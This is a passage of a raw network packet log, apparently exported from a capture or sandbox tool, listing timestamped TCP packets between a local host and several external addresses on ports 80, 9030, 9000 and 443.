Jan 10, 2024 15:41:31.459170103 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.459211111 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.459211111 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.459273100 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.459315062 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.459327936 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.459395885 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.459436893 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.459620953 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.459669113 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.459685087 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.459809065 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.459853888 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.459882975 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.459911108 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.459954023 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.459997892 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.460022926 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.460040092 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.460064888 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.460906029 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.460968018 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.461219072 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.461293936 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.461339951 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.461347103 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.461410046 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.461424112 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.461456060 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.461477041 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.461508989 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.461549997 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.461579084 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.461591959 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.461615086 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.461652994 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.461692095 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.461709976 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.461777925 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.461816072 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.461818933 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.461854935 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.461906910 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.461963892 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.462007046 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.462022066 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.462037086 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.462078094 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.462106943 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.462153912 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.462177992 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.462217093 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.462260008 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.462276936 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.462330103 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.462372065 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.462555885 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.462702990 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.462749004 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.462868929 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.462940931 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.462982893 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.462996006 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.463011026 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.463037968 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.463080883 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.463108063 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.463129997 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.463150024 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.463167906 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.463217020 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.463255882 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.463313103 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.463355064 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.463423014 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.463463068 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.463480949 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.463520050 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.463527918 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.463571072 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.463574886 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.463615894 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.463645935 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.463675976 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.463685989 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.463715076 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.463733912 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.463774920 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.463782072 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.463820934 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.463824987 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.463865042 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.463881969 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.463922024 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.463926077 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.463968992 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.463987112 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.464025974 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.464032888 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.464071989 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.464081049 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.464122057 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.464138985 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.464181900 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.464199066 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.464241028 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.464253902 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.464297056 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.464298010 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.464335918 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.464345932 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.464385986 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.464401007 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.464442015 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.464482069 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.464499950 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.464567900 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.464610100 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.464651108 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.464960098 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.465006113 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.465023041 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.465070009 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.465073109 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.465306997 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.465353966 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.465370893 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.465439081 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.465481043 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.465559006 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.465869904 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.465913057 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.466010094 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.466046095 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.466088057 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.466118097 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.466157913 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.466160059 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.466222048 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.466263056 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.466344118 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.466423988 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.466464043 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.466470957 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.466538906 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.466582060 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.466612101 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.466654062 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.466759920 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.466876984 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.466919899 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.467122078 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.467159986 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.467204094 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.467206001 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.467245102 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.467262983 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.467605114 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.467650890 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.467650890 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.467720985 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.467761993 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.467772007 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.467812061 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.467870951 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.467952013 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.467989922 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.467995882 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.468156099 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.468199968 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.468229055 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.468298912 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.468339920 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.468358994 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.468399048 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.468415022 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.469136953 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.469187021 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.469189882 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.469228983 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.469269037 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.469299078 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.469336987 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.469338894 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.469382048 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.469424009 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.469440937 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.469494104 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.469532967 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.469563961 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.469645977 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.469688892 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.469842911 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.469876051 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.469883919 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.469917059 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.469942093 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.469988108 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.469991922 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.470030069 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.558609009 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.558636904 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.558684111 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.558706999 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.558742046 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.558769941 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.558815002 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.558856010 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.558904886 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.559016943 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.559061050 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.559349060 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.559391022 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.559420109 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.559585094 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.559629917 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.559885979 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.560041904 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.560087919 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.560106039 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.560230017 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.560278893 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.560380936 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.560421944 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.560451984 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.560497046 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.560535908 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.560565948 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.560724974 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.560767889 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.560914040 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.560952902 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.561050892 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.561234951 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:31.561281919 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.562118053 CET	49756	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:41:31.669184923 CET	80	49756	199.58.81.140	192.168.2.6
Jan 10, 2024 15:41:38.785082102 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:38.903166056 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:38.903263092 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:38.903876066 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.023890972 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.038306952 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.038351059 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.038388014 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.038393974 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.038427114 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.038439035 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.038439035 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.038475037 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.038590908 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.038640976 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.038666964 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.038712978 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.044754982 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.044820070 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.044820070 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.044902086 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.044981956 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.044981956 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.044987917 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.045037031 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.156457901 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.156521082 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.156562090 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.156601906 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.156646967 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.156724930 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.156724930 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.156724930 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.156898975 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.156941891 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.157002926 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.157017946 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.157071114 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.157095909 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.157133102 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.157155991 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.157188892 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.159483910 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.159670115 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.162755013 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.162796021 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.162822008 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.162858963 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.162878036 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.162919044 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.162926912 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.162957907 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.162967920 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.163007975 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.163203955 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.163259029 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.163296938 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.163347006 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.163373947 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.163423061 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.163460970 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.163513899 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.277717113 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.277785063 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.277825117 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.277863979 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.277915955 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.277929068 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.277951956 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.277971983 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.278026104 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.278100967 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.278140068 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.278158903 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.278178930 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.278187990 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.278220892 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.278256893 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.278306007 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.278434038 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.278471947 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.278486013 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.278518915 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.278578997 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.278619051 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.278630972 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.278666973 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.278723955 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.278774977 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.279992104 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.280106068 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.280173063 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.280230045 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.280286074 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.280360937 CET	9030	49757	149.56.45.200	192.168.2.6
Jan 10, 2024 15:41:39.280421019 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.280544996 CET	49757	9030	192.168.2.6	149.56.45.200
Jan 10, 2024 15:41:39.369946003 CET	49758	9000	192.168.2.6	107.189.8.226
Jan 10, 2024 15:41:39.371094942 CET	49759	443	192.168.2.6	172.81.131.84
Jan 10, 2024 15:41:39.371165037 CET	443	49759	172.81.131.84	192.168.2.6
Jan 10, 2024 15:41:39.371243954 CET	49759	443	192.168.2.6	172.81.131.84
